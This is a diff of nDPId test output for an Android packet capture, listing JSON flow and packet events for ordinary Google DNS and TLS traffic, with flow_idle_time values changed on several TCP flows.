00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454871600,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871600,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq\/ZAAEARCVTAqAIQwKgCAeYMADUALTc\/5u4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454871601,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871601,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRUPMAAEARpEfAqAIBwKgCEAA15gwAPWHd5u6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} 00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":339,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871601,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871553,"flow_last_seen":1582454871614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871623,"flow_last_seen":1582454871623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871623,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454871623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871623,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8E0lAAEAGZVPAqAIQ2O8meIDqAbtXpCQEAAAAAKAC\/\/9QRAAAAgQFtAQCCAr\/\/zdNAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454871636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871636,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8YK4AAHYGIe7Y7yZ4wKgCEAG7gOoEIWijV6QkBaAS6yBQGwAAAgQFZAQCCAqpXP8l\/\/83TQEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454871641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871641,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0E0pAAEAGZVrAqAIQ2O8meIDqAbtXpCQFBCFopIAQAVdoXgAAAQEICv\/\/N1GpXP8l"} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":349,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871553,"flow_last_seen":1582454871657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871623,"flow_last_seen":1582454871671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871671,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454871676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871676,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrABAAEARCUrAqAIQwKgCAYHYADUALeidI0IBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871676,"flow_last_seen":1582454871676,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871676,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454871677,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871677,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRtlYAAEARPuTAqAIBwKgCEAA1gdgAPR0+I0KBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="} 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"android.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871676,"flow_last_seen":1582454871677,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871677,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":33240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1582454871745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871745,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8bVhAAEAGDXfAqAIQrcJPco\/wAFDXL1ozAAAAAKAC\/\/+PAwAAAgQFtAQCCAr\/\/zdrAAAAAAEDAwg="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871772,"flow_last_seen":1582454871772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871772,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1582454871772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871772,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CzhAAEAGb5fAqAIQrcJPco\/yAFDC1DxKAAAAAKAC\/\/\/BPgAAAgQFtAQCCAr\/\/zdyAAAAAAEDAwg="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454871781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871781,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8S\/EAAHUGde+s2RRKwKgCEAG7zSLiUVJTDpwh4qAS6yCWYgAAAgQFZAQCCAoTCsRq\/\/83agEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1582454871784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871784,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8QWIAAGcGUm2twk9ywKgCEABQj\/AL32zY1y9aNKAS87jv8AAAAgQFlgQCCArQ72G\/\/\/83awEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454871786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871786,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0FoxAAEAGoFzAqAIQrNkUSs0iAbsOnCHi4lFSVIAQAVeungAAAQEICv\/\/N3UTCsRq"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1582454871787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871787,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0bVlAAEAGDX7AqAIQrcJPco\/wAFDXL1o0C99s2YAQAVcQ9wAAAQEICv\/\/N3bQ72G\/"} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":361,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871623,"flow_last_seen":1582454871702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871702,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871741,"flow_last_seen":1582454871741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871741,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454871741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871741,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8FotAAEAGoFXAqAIQrNkUSs0iAbsOnCHhAAAAAKAC\/\/+NXgAAAgQFtAQCCAr\/\/zdqAAAAAAEDAwg="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871745,"flow_last_seen":1582454871745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871745,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1582454871745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871745,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8bVhAAEAGDXfAqAIQrcJPco\/wAFDXL1ozAAAAAKAC\/\/+PAwAAAgQFtAQCCAr\/\/zdrAAAAAAEDAwg="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871772,"flow_last_seen":1582454871772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871772,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1582454871772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871772,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8CzhAAEAGb5fAqAIQrcJPco\/yAFDC1DxKAAAAAKAC\/\/\/BPgAAAgQFtAQCCAr\/\/zdyAAAAAAEDAwg="} 